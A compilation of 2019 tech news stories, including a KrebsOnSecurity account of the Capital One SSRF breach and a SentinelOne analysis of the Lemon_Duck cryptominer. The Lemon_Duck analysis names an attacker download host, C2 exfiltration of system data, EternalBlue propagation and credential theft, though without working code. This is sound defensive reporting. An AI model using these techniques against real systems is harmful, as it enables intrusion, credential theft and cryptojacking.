Salesforce closes $15.7B Tableau deal

In an amazingly quick turnaround for a deal of this scope, Salesforce announced today that it has closed the $15.7 billion Tableau deal announced in June. The deal is by far the biggest acquisition in Salesforce history, a company known for being highly acquisitive.

A deal of this size usually faces a high level of regulatory scrutiny and can take six months or longer to close, but this one breezed through the process and closed in less than two months.

With Tableau and MuleSoft (a company it bought last year for $6.5 billion) in the fold, Salesforce has a much broader view of the enterprise than it could as a pure cloud company. It has access to data wherever it lives, whether on premises or in the cloud, and with Tableau, it enables customers to bring that data to life by visualizing it.

This was a prospect that excited Salesforce chairman Marc Benioff. “Tableau will make Salesforce Customer 360, including Salesforce’s analytics capabilities, stronger than ever, enabling our customers to accelerate innovation and make smarter decisions across every part of their business,” Benioff said in a statement.

As with any large acquisition involving two enormous organizations, combining them could prove challenging, and the real test of this deal, once the dust has settled, will be how smoothly that transition happens and how well the companies can work together and become a single entity under the Salesforce umbrella.

In theory, having Tableau gives Salesforce another broad path into larger and more expansive enterprise sales, but the success of the deal will really hinge on how well it folds Tableau into the Salesforce sales machine.

United Airlines CISO Emily Heath joins TC Sessions: Enterprise this September

In an era of massive data breaches, most recently the Capital One fiasco, the risk of a cyberattack and the costly consequences are the top existential threat to corporations big and small. At TechCrunch’s first-ever enterprise-focused event (p.s. early-bird sales end August 9), that topic will be front and center throughout the day.

That’s why we’re delighted to announce United’s chief information security officer Emily Heath will join TC Sessions: Enterprise in San Francisco on September 5, where we will discuss and learn how one of the world’s largest airlines keeps its networks safe.

Joining her to talk enterprise security will be a16z partner Martin Casado and DUO / Cisco’s head of advisory CISOs Wendy Nather, among others still to be announced.

At United, Heath oversees the airline’s cybersecurity program and its IT regulatory, governance and risk management.

The U.S.-based airline has more than 90,000 employees serving 4,500 flights a day to 338 airports, including New York, San Francisco, Los Angeles and Washington, D.C.

A native of Manchester, U.K., Heath served as a former police detective in the U.K. Financial Crimes Unit where she led investigations into international investment fraud, money laundering and large scale cases of identity theft — and ran joint investigations with the FBI, SEC and London’s Serious Fraud Office.

Heath and her teams have been the recipients of CSO Magazine’s CSO50 Awards for their work in cybersecurity and risk.

At TC Sessions: Enterprise, Heath will join a panel of cybersecurity experts to discuss security on enterprise networks large and small — from preventing data from leaking to keeping bad actors out of their network — where we’ll learn how a modern CSO moves fast without breaking things.

Join hundreds of today’s leading enterprise experts for this single-day event when you purchase a ticket to the show. The $249 early-bird sale ends Friday, August 9. Make sure to grab your tickets today and save $100 before prices go up.

Early-bird pricing ends next week for TC Sessions: Enterprise 2019

Here are five words you’ll never hear spring from the mouth of an early-stage startupper. “I don’t mind paying more.” We feel you, and that’s why we’re letting you know that the price of admission to TC Sessions Enterprise 2019, which takes place on September 5, goes up next week.

Our $249 early-bird ticket price remains in play until 11:59 p.m. (PT) on August 9. Buy your ticket now and save $100.

Now that you’ve scored the best possible price, get ready to experience a full day focused on what’s around the corner for enterprise — the biggest and richest startup category in Silicon Valley. More than 1,000 attendees, including many of the industry’s top founders, CEOs, investors and technologists, will join TechCrunch’s editors onstage for interviews covering all the big enterprise topics — AI, the cloud, Kubernetes, data and security, marketing automation and event quantum computing, to name a few.

This conference features more than 20 sessions on the main stage, plus separate Q&As with the speakers and breakout sessions. Check out the agenda here.

Just to peek at one session, TechCrunch’s Connie Loizos will interview three top VCs — Jason Green (Emergence Capital), Maha Ibrahim (Canaan Partners) and Rebecca Lynn (Canvas Ventures) — in a session entitled Investing with an Eye to the Future. In an ever-changing technological landscape, it’s not easy for VCs to know what’s coming next and how to place their bets. Yet, it’s the job of investors to peer around the corner and find the next big thing, whether that’s in AI, serverless, blockchain, edge computing or other emerging technologies. Our panel will look at the challenges of enterprise investing, what they look for in enterprise startups and how they decide where to put their money.

Want to boost your ROI? Take advantage of our group discount — save 20% when you buy four or more tickets at once. And remember, for every ticket you buy to TC Sessions: Enterprise, we’ll register you for a free Expo Only pass to TechCrunch Disrupt SF on October 2-4.

TC Sessions: Enterprise takes place September 5, but your chance to save $100 ends next week. No one enjoys paying more, so buy an early-bird ticket today, cross it off your to-do list and enjoy your savings.

Is your company interested in sponsoring or exhibiting at TC Sessions: Enterprise 2019? Contact our sponsorship sales team by filling out this form.

What We Can Learn from the Capital One Hack

On Monday, a former Amazon employee was arrested and charged with stealing more than 100 million consumer applications for credit from Capital One. Since then, many have speculated the breach was perhaps the result of a previously unknown “zero-day” flaw, or an “insider” attack in which the accused took advantage of access surreptitiously obtained from her former employer. But new information indicates the methods she deployed have been well understood for years.

What follows is based on interviews with almost a dozen security experts, including one who is privy to details about the ongoing breach investigation. Because this incident deals with somewhat jargon-laced and esoteric concepts, much of what is described below has been dramatically simplified. Anyone seeking a more technical explanation of the basic concepts referenced here should explore some of the many links included in this story.

According to a source with direct knowledge of the breach investigation, the problem stemmed in part from a misconfigured open-source Web Application Firewall (WAF) that Capital One was using as part of its operations hosted in the cloud with Amazon Web Services (AWS).

Known as “ModSecurity,” this WAF is deployed along with the open-source Apache Web server to provide protections against several classes of vulnerabilities that attackers most commonly use to compromise the security of Web-based applications.

The misconfiguration of the WAF allowed the intruder to trick the firewall into relaying requests to a key back-end resource on the AWS platform. This resource, known as the “metadata” service, is responsible for handing out temporary information to a cloud server, including current credentials sent from a security service to access any resource in the cloud to which that server has access.

In AWS, exactly what those credentials can be used for hinges on the permissions assigned to the resource that is requesting them. In Capital One’s case, the misconfigured WAF for whatever reason was assigned too many permissions, i.e. it was allowed to list all of the files in any buckets of data, and to read the contents of each of those files.

The type of vulnerability exploited by the intruder in the Capital One hack is a well-known method called a “Server Side Request Forgery” (SSRF) attack, in which a server (in this case, CapOne’s WAF) can be tricked into running commands that it should never have been permitted to run, including those that allow it to talk to the metadata service.

Evan Johnson, manager of the product security team at Cloudflare, recently penned an easily digestible column on the Capital One hack and the challenges of detecting and blocking SSRF attacks targeting cloud services. Johnson said it’s worth noting that SSRF attacks are not among the dozen or so attack methods for which detection rules are shipped by default in the WAF exploited as part of the Capital One intrusion.

“SSRF has become the most serious vulnerability facing organizations that use public clouds,” Johnson wrote. “The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform.”

Johnson said AWS could address this shortcoming by including extra identifying information in any request sent to the metadata service, as Google has already done with its cloud hosting platform. He also acknowledged that doing so could break a lot of backwards compatibility within AWS.

“There’s a lot of specialized knowledge that comes with operating a service within AWS, and to someone without specialized knowledge of AWS, [SSRF attacks are] not something that would show up on any critical configuration guide,” Johnson said in an interview with KrebsOnSecurity.

“You have to learn how EC2 works, understand Amazon’s Identity and Access Management (IAM) system, and how to authenticate with other AWS services,” he continued. “A lot of people using AWS will interface with dozens of AWS services and write software that orchestrates and automates new services, but in the end people really lean into AWS a ton, and with that comes a lot of specialized knowledge that is hard to learn and hard to get right.”

In a statement provided to KrebsOnSecurity, Amazon said it is inaccurate to argue that the Capital One breach was caused by AWS IAM, the instance metadata service, or the AWS WAF in any way.

“The intrusion was caused by a misconfiguration of a web application firewall and not the underlying infrastructure or the location of the infrastructure,” the statement reads. “AWS is constantly delivering services and functionality to anticipate new threats at scale, offering more security capabilities and layers than customers can find anywhere else including within their own datacenters, and when broadly used, properly configured and monitored, offer unmatched security—and the track record for customers over 13+ years in securely using AWS provides unambiguous proof that these layers work.”

Amazon pointed to several (mostly a la carte) services it offers AWS customers to help mitigate many of the threats that were key factors in this breach, including:

Access Advisor, which helps identify and scope down AWS roles that may have more permissions than they need;
GuardDuty, designed to raise alarms when someone is scanning for potentially vulnerable systems or moving unusually large amounts of data to or from unexpected places;
The AWS WAF, which Amazon says can detect common exploitation techniques, including SSRF attacks;
Amazon Macie, designed to automatically discover, classify and protect sensitive data stored in AWS.

William Bengston, formerly a senior security engineer at Netflix, wrote a series of blog posts last year on how Netflix built its own systems for detecting and preventing credential compromises in AWS. Interestingly, Bengston was hired roughly two months ago to be director of cloud security for Capital One. My guess is Capital One now wishes they had somehow managed to lure him away sooner.

Rich Mogull is founder and chief technology officer with DisruptOPS, a firm that helps companies secure their cloud infrastructure. Mogull said one major challenge for companies moving their operations from sprawling, expensive physical data centers to the cloud is that very often the employees responsible for handling that transition are application and software developers who may not be as steeped as they should in security.

“There is a basic skills and knowledge gap that everyone in the industry is fighting to deal with right now,” Mogull said. “For these big companies making that move, they have to learn all this new stuff while maintaining their old stuff. I can get you more secure in the cloud more easily than on-premise at a physical data center, but there’s going to be a transition period as you’re acquiring that new knowledge.”

Image: Capital One

Since news of the Capital One breach broke on Monday, KrebsOnSecurity has received numerous emails and phone calls from security executives who are desperate for more information about how they can avoid falling prey to the missteps that led to this colossal breach (indeed, those requests were part of the impetus behind this story).

Some of those people included executives at big competing banks that haven’t yet taken the plunge into the cloud quite as deeply as Capital One has. But it’s probably not much of a stretch to say they’re all lining up in front of the diving board.

It’s been interesting to watch over the past couple of years how various cloud providers have responded to major outages on their platforms — very often soon after publishing detailed post-mortems on the underlying causes of the outage and what they are doing to prevent such occurrences in the future. In the same vein, it would be wonderful if this kind of public accounting extended to other big companies in the wake of a massive breach.

I’m not holding out much hope that we will get such detail officially from Capital One, which declined to comment on the record and referred me to their statement on the breach and to the Justice Department’s complaint against the hacker. That’s probably to be expected, seeing as the company is already facing a class action lawsuit over the breach and is likely to be targeted by more lawsuits going forward.

But as long as the public and private response to data breaches remains orchestrated primarily by attorneys (which is certainly the case now at most major corporations), everyone else will continue to lack the benefit of being able to learn from and avoid those same mistakes.

EternalBlue & The Lemon_Duck Cryptominer Attack

Money has always been one of the strongest motivators for cybercriminals, and cryptomining is a popular method used by malicious actors to create profit by abusing the computing power of endusers’ machines and servers. Because of its ability to generate easy, risk-free money, cryptomining is shifting from in-browser hijacks to on-device malware, and new methods and techniques are developing all the time. In this post, we discuss a case encountered by the SentinelOne Vigilance team involving a new fileless cryptomining malware dubbed Lemon_Duck, which leverages Eternalblue in order to spread across a network. We take a deep dive into the attack and provide a detailed analysis. 

image of lemon duck

Overview of Lemon_Duck

During the past few weeks, Vigilance researchers have seen a rise in lateral movement detections on customer endpoints that were all using the same technique. 

While investigating this attack campaign, we found some useful source code on GitHub published by researchers at GuardiCore, who uploaded the Base64 code of most of the attacker scripts. 

image of lemon_duck attack scripts

The campaign also uses Eternalblue, and PowerSploit, both tools that have been seen in the wild now for some years but which threat actors continue to use as an attack vector due to their continued success in many enterprise environments.

The name Lemon_Duck, which may sound innocent enough, derives from the name of a variable used throughout the attack scripts used in this campaign. It will appear at every stage of the attack, including in the code used to download payloads, construct headers that contain system information about the victim’s device and many other places.  

Lemon_Duck On Execution

The classic initial infection vector was via lateral movement activity that executed a Remote Procedure Call, which we subsequently identified as an Eternalblue exploitation.

image of process service

The attack first creates a new service with a random name on the victim’s machine to gain persistence.

image of random name generated

Then, as can be seen in the S1 Attack Storyline below, it initiates a fileless attack using cmd.exe that executes the following commands:

Network Shell (Netsh.exe): in order to configure the Firewall so that the network traffic will be redirected to 1.1.1.1:53 via new opened port 65529

Task Scheduler: creates a task called Rtsa in order to gain persistence and downloads a file ipc.jsp from the attacker’s server t[.]zer2[.]com

image of attack story line

Once the commands have been invoked, it downloads the file ipc.jsp, which contains the following partially decoded Base64:

image of lemon_duck base64 1

The script is executing multiple URLs in memory such that for each one it will create a new Scheduler Task in order to download the next script in the attack called v.js.

The v.js script contains the following partially decoded Base64:

image of lemon_duck base 64 2

The purpose of this script is to gather system information from the victim’s machine, in the following order: Computer Name, GUID, MAC Address, BIT Architecture and Timestamp.

Once both URL and Headers have been constructed, it sends the data to a C2 server in order to download the relevant module for that specific machine.

Such activity could also be seen in our Agent, which shows the WMI queries events:

image of wmi query

While the module keeps alive the connection with the mining pool domains and utilizes the victim’s GPU CPU in order to mine cryptocurrency, it also propagates itself by creating two mutexes, LocalIf and LocalMn. These are responsible for downloading two files:

if.bin SHA-1: 370AC4E31B27B083ED450A18681FABEFB1E7042D

m6.bin SHA-1: EA856A9F281DC5785F0DCD3D6AC23BA94F2AACA1 

image of locallf call
image of localMN call

The bin files contain two major tools:

  • PowerSploit: Uses Invoke-DllInjection for Privilege Escalation, which gives the attacker the ability to inject any DLL file into any given process ID. 
  • Eternalblue Exploit: Used as a propagation tool, which gives the attacker the ability to propagate via mssql scanning, utilizing vulnerabilities in the SMB protocol.

image of eternal blue exploit 1
image of eternal blue exploit 2

The attack also attempts to steal credentials by utilizing techniques such as brute-force and Pass-the-Hash attacks:

image of password attacks

Mitigation

Even though the malware is new and fileless, the SentinelOne Agent has a behavioral engine that detects the abnormal activity of this malware. In this case, the customer was using S1 advanced next-gen solution and had the Vigilance service – an experienced team of analysts who acted in real-time, identified and mitigated the attack with a single remediation command from the management console.

image of lateral movement in console

Without SentinelOne protection, security analysts are advised to look out for PowerShell post-exploitation scripts attempting to leverage Mitre ATT&CK techniques T1064 and T1086. These two techniques are basic and thus very common. They can be easily implemented even by amateur hackers. Recommended mitigations for these and other attack techniques can also be found on MITRE’s website.

Conclusion

Attacks like Lemon_Duck, which use tools developed by nation state actors and leaked online for use by ordinary criminals, are a growing problem for the enterprise. The availability of tools like Eternalblue, combined with public exploit kits, gives less sophisticated attackers a good chance of bypassing security software that is not capable of detecting malicious behaviour without relying on file signatures, reputation or whitelisting policies. Tools that rely on cloud connectivity may also fail to beat these kinds of attacks on time, too, due to the inevitable delay and the chance of lost internet connectivity. If you’d like to see for yourself how SentinelOne’s multi-layered approach to security can solve these problems for your business, contact us for a free demo today.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Cloud-based design tool Figma launches plug-ins

Figma, the startup looking to put design tools in the cloud, has today announced new plug-ins for the platform that will help users clean up their workflows.

Figma co-founder and CEO Dylan Field says that plug-ins have been the most requested feature from users since the company’s launch. So, for the last year, the team has been working to build plug-in functionality on the back of Figma’s API (launched in March 2018) with three main priorities: stability, speed and security.

The company has been testing plug-ins in beta for a while now, with 40 plug-ins approved at launch today.

Here are some of the standouts from launch today:

On the utility side, Rename It is a plug-in that allows designers to automatically rename and organize their layers as they work. Content Buddy, on the other hand, gives users the ability to add placeholder text (for things like phone numbers, names, etc.) that they can automatically find and replace later. Stark and ColorBlind are both accessibility plug-ins that help designers make sure their work meets the WCAG 2.0 contrast accessibility guidelines, and actually see their designs through the lens of eight different types of color vision deficiencies, respectively.

Other plug-ins allow for adding animation (Figmotion), changing themes (Themer), adding a map to a design (Map Maker) and more.

Anyone can create plug-ins for public use on the Figma platform, but folks can also make private plug-ins for enterprise use, as well. For example, a Microsoft employee built a plug-in that automatically changes the theme of the design based on the various Microsoft products, such as Word, Outlook, etc.

microsoft themes final

Field says that the company currently has no plans to monetize plug-ins. Rather, the addition of plug-ins to the platform is a move based on customer happiness and satisfaction. Moreover, Figma’s home on the web allows for the product to evolve more rapidly and in tune with customers. Rather than having to build each individual feature on its own, Figma can now open up the platform to its power users to build what they’d like into the web app.

Figma has raised a total of nearly $83 million since launch, according to Crunchbase. As of the company’s latest funding round ($40 million led by Sequoia six months ago), Figma was valued at $440 million post-funding.

Why AWS gains big storage efficiencies with E8 acquisition

AWS is already the clear market leader in the cloud infrastructure market, but it’s never been an organization that rests on its past successes. Whether it’s a flurry of new product announcements and enhancements every year, or making strategic acquisitions.

When it bought Israeli storage startup E8 yesterday, it might have felt like a minor move on its face, but AWS was looking, as it always does, to find an edge and reduce the costs of operations in its data centers. It was also very likely looking forward to the next phase of cloud computing. Reports have pegged the deal at between $50 and $60 million.

What E8 gives AWS for relatively cheap money is highly advanced storage capabilities, says Steve McDowell, senior storage analyst at Moor Research and Strategy. “E8 built a system that delivers extremely high-performance/low-latency flash (and Optane) in a shared-storage environment,” McDowell told TechCrunch.

Microsoft Azure now lets you have a server all to yourself

Microsoft today announced the preview launch of Azure Dedicated Host, a new cloud service that will allow you to run your virtual machines on single-tenant physical services. That means you’re not sharing any resources on that server with anybody else and you’ll get full control over everything that’s running on that machine.

Previously, Azure already offered isolated Virtual Machine sizes for two very large virtual machine types. Those are still available, but their use cases are comparably limited to these new hosts, which offer far more flexibility.

With this move, Microsoft is following in the footsteps of AWS, which also offers Dedicated Hosts with very similar capabilities. Google Cloud, too, offers what it calls “sole-tenant nodes.”

Azure Dedicated Host will support Windows, Linux and SQL Server virtual machines and pricing is per host, independent of the number of virtual machines you end up running on them. You can currently opt for machines with up to 48 physical cores and prices start at $4.039 per hour.

To do this, Microsoft is offering two different processors to power these machines. Type 1 is based on the 2.3 GHz Intel Xeon E5-2673 v4 with up to 3.5 gigahertz of clock speed, while Type 2 features the Intel Xeon® Platinum 8168 with single-core clock speeds of up to 3.7 gigahertz. The available memory ranges from 144GiB to 448GiB. You can find more details here.

As Microsoft notes, these new dedicated hosts can help companies reach their compliance requirements for physical security, data integrity and monitoring. The dedicated hosts still share the same underlying infrastructure as any other host in the Azure data centers, but users have full control over any maintenance window that could impact their servers.

These dedicated hosts can also be grouped into larger host groups in a given Azure region, allowing you to build clusters of your own physical servers inside the Azure data center. Because you’re actually renting a physical machine, any hardware issue on that machine will impact the virtual machines you are running on them, so chances are you’ll want to have multiple dedicated hosts for your failover strategy anyway.

110b3725 54e2 4840 a609 adf18fcbe32f

President throws latest wrench in $10B JEDI cloud contract selection process

The $10 billion, decade-long JEDI cloud contract drama continues. It’s a process that has been dogged by complaints, regulatory oversight and court cases. Throughout the months-long selection process, the Pentagon has repeatedly denied accusations that the contract was somehow written to make Amazon a favored vendor, but today The Washington Post reports President Trump has asked the newly appointed Defense Secretary, Mark T. Esper, to examine the process because of concerns over that very matter.

The Defense Department called for bids last year for a $10 billion, decade-long contract. From the beginning, Oracle in particular complained that the process favored Amazon. Even before the RFP process began Oracle executive Safra Catz took her concerns directly to the president, but at that time he did not intervene. Later, the company filed a complaint with the Government Accountability Office, which ruled that the procurement process was fair.

Finally, the company took the case to court, alleging that a person involved in defining the selection process had a conflict of interest, due to being an employee at Amazon before joining the DoD. That case was dismissed last month.

In April, the DoD named Microsoft and Amazon as the two finalists, and the winner was finally expected to be named some time this month. It appeared that we were close to the finish line, but now that the president has intervened at the 11th hour, it’s impossible to know what the outcome will be.

What we do know is that this is a pivotal project for the DoD, which is aimed at modernizing the U.S. military for the next decade and beyond. The fact is that the two finalists made perfect sense. They are the two market leaders, and each has tools, technologies and experience working with sensitive government contracts.

Amazon is the market leader, with 33% market share. Microsoft is No. 2, with 16%. The No. 3 vendor, Google, dropped out before the RFP process began. It is unclear at this point whether the president’s intervention will have any influence on the final decision, but The Washington Post reports it is an unusual departure from government procurement procedures.

Dasha AI is calling so you don’t have to

While you’d be hard pressed to find any startup not brimming with confidence over the disruptive idea they’re chasing, it’s not often you come across a young company as calmly convinced it’s engineering the future as Dasha AI.

The team is building a platform for designing human-like voice interactions to automate business processes. Put simply, it’s using AI to make machine voices a whole lot less robotic.

“What we definitely know is this will definitely happen,” says CEO and co-founder Vladislav Chernyshov. “Sooner or later the conversational AI/voice AI will replace people everywhere where the technology will allow. And it’s better for us to be the first mover than the last in this field.”

“In 2018 in the US alone there were 30 million people doing some kind of repetitive tasks over the phone. We can automate these jobs now or we are going to be able to automate it in two years,” he goes on. “If you multiple it with Europe and the massive call centers in India, Pakistan and the Philippines you will probably have something like close to 120M people worldwide… and they are all subject for disruption, potentially.”

The New York based startup has been operating in relative stealth up to now. But it’s breaking cover to talk to TechCrunch — announcing a $2M seed round, led by RTP Ventures and RTP Global: An early stage investor that’s backed the likes of Datadog and RingCentral. RTP’s venture arm, also based in NY, writes on its website that it prefers engineer-founded companies — that “solve big problems with technology”. “We like technology, not gimmicks,” the fund warns with added emphasis.

Dasha’s core tech right now includes what Chernyshov describes as “a human-level, voice-first conversation modelling engine”; a hybrid text-to-speech engine which he says enables it to model speech disfluencies (aka, the ums and ahs, pitch changes etc that characterize human chatter); plus “a fast and accurate” real-time voice activity detection algorithm which detects speech in under 100 milliseconds, meaning the AI can turn-take and handle interruptions in the conversation flow. The platform can also detect a caller’s gender — a feature that can be useful for healthcare use-cases, for example.

Another component Chernyshov flags is “an end-to-end pipeline for semi-supervised learning” — so it can retrain the models in real time “and fix mistakes as they go” — until Dasha hits the claimed “human-level” conversational capability for each business process niche. (To be clear, the AI cannot adapt its speech to an interlocutor in real-time — as human speakers naturally shift their accents closer to bridge any dialect gap — but Chernyshov suggests it’s on the roadmap.)

“For instance, we can start with 70% correct conversations and then gradually improve the model up to say 95% of correct conversations,” he says of the learning element, though he admits there are a lot of variables that can impact error rates — not least the call environment itself. Even cutting edge AI is going to struggle with a bad line.

The platform also has an open API so customers can plug the conversation AI into their existing systems — be it telephony, Salesforce software or a developer environment, such as Microsoft Visual Studio.

Currently they’re focused on English, though Chernyshov says the architecture is “basically language agnostic” — but does requires “a big amount of data”.

The next step will be to open up the dev platform to enterprise customers, beyond the initial 20 beta testers, which include companies in the banking, healthcare and insurance sectors — with a release slated for later this year or Q1 2020.

Test use-cases so far include banks using the conversation engine for brand loyalty management to run customer satisfaction surveys that can turnaround negative feedback by fast-tracking a response to a bad rating — by providing (human) customer support agents with an automated categorization of the complaint so they can follow up more quickly. “This usually leads to a wow effect,” says Chernyshov.

Ultimately, he believes there will be two or three major AI platforms globally providing businesses with an automated, customizable conversational layer — sweeping away the patchwork of chatbots currently filling in the gap. And of course Dasha intends their ‘Digital Assistant Super Human Alike’ to be one of those few.

“There is clearly no platform [yet],” he says. “Five years from now this will sound very weird that all companies now are trying to build something. Because in five years it will be obvious — why do you need all this stuff? Just take Dasha and build what you want.”

“This reminds me of the situation in the 1980s when it was obvious that the personal computers are here to stay because they give you an unfair competitive advantage,” he continues. “All large enterprise customers all over the world… were building their own operating systems, they were writing software from scratch, constantly reinventing the wheel just in order to be able to create this spreadsheet for their accountants.

“And then Microsoft with MS-DOS came in… and everything else is history.”

That’s not all they’re building, either. Dasha’s seed financing will be put towards launching a consumer-facing product atop its b2b platform to automate the screening of recorded message robocalls. So, basically, they’re building a robot assistant that can talk to — and put off — other machines on humans’ behalf.

Which does kind of suggest the AI-fuelled future will entail an awful lot of robots talking to each other… 🤖🤖🤖

Chernyshov says this b2c call screening app will most likely be free. But then if your core tech looks set to massively accelerate a non-human caller phenomenon that many consumers already see as a terrible plague on their time and mind then providing free relief — in the form of a counter AI — seems the very least you should do.

Not that Dasha can be accused of causing the robocaller plague, of course. Recorded messages hooked up to call systems have been spamming people with unsolicited calls for far longer than the startup has existed.

Dasha’s PR notes Americans were hit with 26.3BN robocalls in 2018 alone — up “a whopping” 46% on 2017.

Its conversation engine, meanwhile, has only made some 3M calls to date, clocking its first call with a human in January 2017. But the goal from here on in is to scale fast. “We plan to aggressively grow the company and the technology so we can continue to provide the best voice conversational AI to a market which we estimate to exceed $30BN worldwide,” runs a line from its PR.

After the developer platform launch, Chernyshov says the next step will be to open up access to business process owners by letting them automate existing call workflows without needing to be able to code (they’ll just need an analytic grasp of the process, he says).

Later — pegged for 2022 on the current roadmap — will be the launch of “the platform with zero learning curve”, as he puts it. “You will teach Dasha new models just like typing in a natural language and teaching it like you can teach any new team member on your team,” he explains. “Adding a new case will actually look like a word editor — when you’re just describing how you want this AI to work.”

His prediction is that a majority — circa 60% — of all major cases that business face — “like dispatching, like probably upsales, cross sales, some kind of support etc, all those cases” — will be able to be automated “just like typing in a natural language”.

So if Dasha’s AI-fuelled vision of voice-based business process automation come to fruition then humans getting orders of magnitude more calls from machines looks inevitable — as machine learning supercharges artificial speech by making it sound slicker, act smarter and seem, well, almost human.

But perhaps a savvier generation of voice AIs will also help manage the ‘robocaller’ plague by offering advanced call screening? And as non-human voice tech marches on from dumb recorded messages to chatbot-style AIs running on scripted rails to — as Dasha pitches it — fully responsive, emoting, even emotion-sensitive conversation engines that can slip right under the human radar maybe the robocaller problem will eat itself? I mean, if you didn’t even realize you were talking to a robot how are you going to get annoyed about it?

Dasha claims 96.3% of the people who talk to its AI “think it’s human”, though it’s not clear what sample size the claim is based on. (To my ear there are definite ‘tells’ in the current demos on its website. But in a cold-call scenario it’s not hard to imagine the AI passing, if someone’s not paying much attention.)

The alternative scenario, in a future infested with unsolicited machine calls, is that all smartphone OSes add kill switches, such as the one in iOS 13 — which lets people silence calls from unknown numbers.

And/or more humans simply never pick up phone calls unless they know who’s on the end of the line.

So it’s really doubly savvy of Dasha to create an AI capable of managing robot calls — meaning it’s building its own fallback — a piece of software willing to chat to its AI in future, even if actual humans refuse.

Dasha’s robocall screener app, which is slated for release in early 2020, will also be spammer-agnostic — in that it’ll be able to handle and divert human salespeople too, as well as robots. After all, a spammer is a spammer.

“Probably it is the time for somebody to step in and ‘don’t be evil’,” says Chernyshov, echoing Google’s old motto, albeit perhaps not entirely reassuringly given the phrase’s lapsed history — as we talk about the team’s approach to ecosystem development and how machine-to-machine chat might overtake human voice calls.

“At some point in the future we will be talking to various robots much more than we probably talk to each other — because you will have some kind of human-like robots at your house,” he predicts. “Your doctor, gardener, warehouse worker, they all will be robots at some point.”

The logic at work here is that if resistance to an AI-powered Cambrian Explosion of machine speech is futile, it’s better to be at the cutting edge, building the most human-like robots — and making the robots at least sound like they care.

Dasha’s conversational quirks certainly can’t be called a gimmick. Even if the team’s close attention to mimicking the vocal flourishes of human speech — the disfluencies, the ums and ahs, the pitch and tonal changes for emphasis and emotion — might seem so at first airing.

In one of the demos on its website you can hear a clip of a very chipper-sounding male voice, who identifies himself as “John from Acme Dental”, taking an appointment call from a female (human), and smoothly dealing with multiple interruptions and time/date changes as she changes her mind. Before, finally, dealing with a flat cancelation.

A human receptionist might well have got mad that the caller essentially just wasted their time. Not John, though. Oh no. He ends the call as cheerily as he began, signing off with an emphatic: “Thank you! And have a really nice day. Bye!”

If the ultimate goal is Turing Test levels of realism in artificial speech — i.e. a conversation engine so human-like it can pass as human to a human ear — you do have to be able to reproduce, with precision timing, the verbal baggage that’s wrapped around everything humans say to each other.

This tonal layer does essential emotional labor in the business of communication, shading and highlighting words in a way that can adapt or even entirely transform their meaning. It’s an integral part of how we communicate. And thus a common stumbling block for robots.

So if the mission is to power a revolution in artificial speech that humans won’t hate and reject then engineering full spectrum nuance is just as important a piece of work as having an amazing speech recognition engine. A chatbot that can’t do all that is really the gimmick.

Chernyshov claims Dasha’s conversation engine is “at least several times better and more complex than [Google] Dialogflow, [Amazon] Lex, [Microsoft] Luis or [IBM] Watson”, dropping a laundry list of rival speech engines into the conversation.

He argues none are on a par with what Dasha is being designed to do.

The difference is the “voice-first modelling engine”. “All those [rival engines] were built from scratch with a focus on chatbots — on text,” he says, couching modelling voice conversation “on a human level” as much more complex than the more limited chatbot-approach — and hence what makes Dasha special and superior.

“Imagination is the limit. What we are trying to build is an ultimate voice conversation AI platform so you can model any kind of voice interaction between two or more human beings.”

Google did demo its own stuttering voice AI — Duplex — last year, when it also took flak for a public demo in which it appeared not to have told restaurant staff up front they were going to be talking to a robot.

Chernyshov isn’t worried about Duplex, though, saying it’s a product, not a platform.

“Google recently tried to headhunt one of our developers,” he adds, pausing for effect. “But they failed.”

He says Dasha’s engineering staff make up more than half (28) its total headcount (48), and include two doctorates of science; three PhDs; five PhD students; and ten masters of science in computer science.

It has an R&D office in Russian which Chernyshov says helps makes the funding go further.

“More than 16 people, including myself, are ACM ICPC finalists or semi finalists,” he adds — likening the competition to “an Olympic game but for programmers”. A recent hire — chief research scientist, Dr Alexander Dyakonov — is both a doctor of science professor and former Kaggle No.1 GrandMaster in machine learning. So with in-house AI talent like that you can see why Google, uh, came calling…

Dasha

 

But why not have Dasha ID itself as a robot by default? On that Chernyshov says the platform is flexible — which means disclosure can be added. But in markets where it isn’t a legal requirement the door is being left open for ‘John’ to slip cheerily by. Bladerunner here we come.

The team’s driving conviction is that emphasis on modelling human-like speech will, down the line, allow their AI to deliver universally fluid and natural machine-human speech interactions which in turn open up all sorts of expansive and powerful possibilities for embeddable next-gen voice interfaces. Ones that are much more interesting than the current crop of gadget talkies.

This is where you could raid sci-fi/pop culture for inspiration. Such as Kitt, the dryly witty talking car from the 1980s TV series Knight Rider. Or, to throw in a British TV reference, Holly the self-depreciating yet sardonic human-faced computer in Red Dwarf. (Or indeed Kryten the guilt-ridden android butler.) Chernyshov’s suggestion is to imagine Dasha embedded in a Boston Dynamics robot. But surely no one wants to hear those crawling nightmares scream…

Dasha’s five-year+ roadmap includes the eyebrow-raising ambition to evolve the technology to achieve “a general conversational AI”. “This is a science fiction at this point. It’s a general conversational AI, and only at this point you will be able to pass the whole Turing Test,” he says of that aim.

“Because we have a human level speech recognition, we have human level speech synthesis, we have generative non-rule based behavior, and this is all the parts of this general conversational AI. And I think that we can we can — and scientific society — we can achieve this together in like 2024 or something like that.

“Then the next step, in 2025, this is like autonomous AI — embeddable in any device or a robot. And hopefully by 2025 these devices will be available on the market.”

Of course the team is still dreaming distance away from that AI wonderland/dystopia (depending on your perspective) — even if it’s date-stamped on the roadmap.

But if a conversational engine ends up in command of the full range of human speech — quirks, quibbles and all — then designing a voice AI may come to be thought of as akin to designing a TV character or cartoon personality. So very far from what we currently associate with the word ‘robotic’. (And wouldn’t it be funny if the term ‘robotic’ came to mean ‘hyper entertaining’ or even ‘especially empathetic’ thanks to advances in AI.)

Let’s not get carried away though.

In the meanwhile, there are ‘uncanny valley’ pitfalls of speech disconnect to navigate if the tone being (artificially) struck hits a false note. (And, on that front, if you didn’t know ‘John from Acme Dental’ was a robot you’d be forgiven for misreading his chipper sign off to a total time waster as pure sarcasm. But an AI can’t appreciate irony. Not yet anyway.)

Nor can robots appreciate the difference between ethical and unethical verbal communication they’re being instructed to carry out. Sales calls can easily cross the line into spam. And what about even more dystopic uses for a conversation engine that’s so slick it can convince the vast majority of people it’s human — like fraud, identity theft, even election interference… the potential misuses could be terrible and scale endlessly.

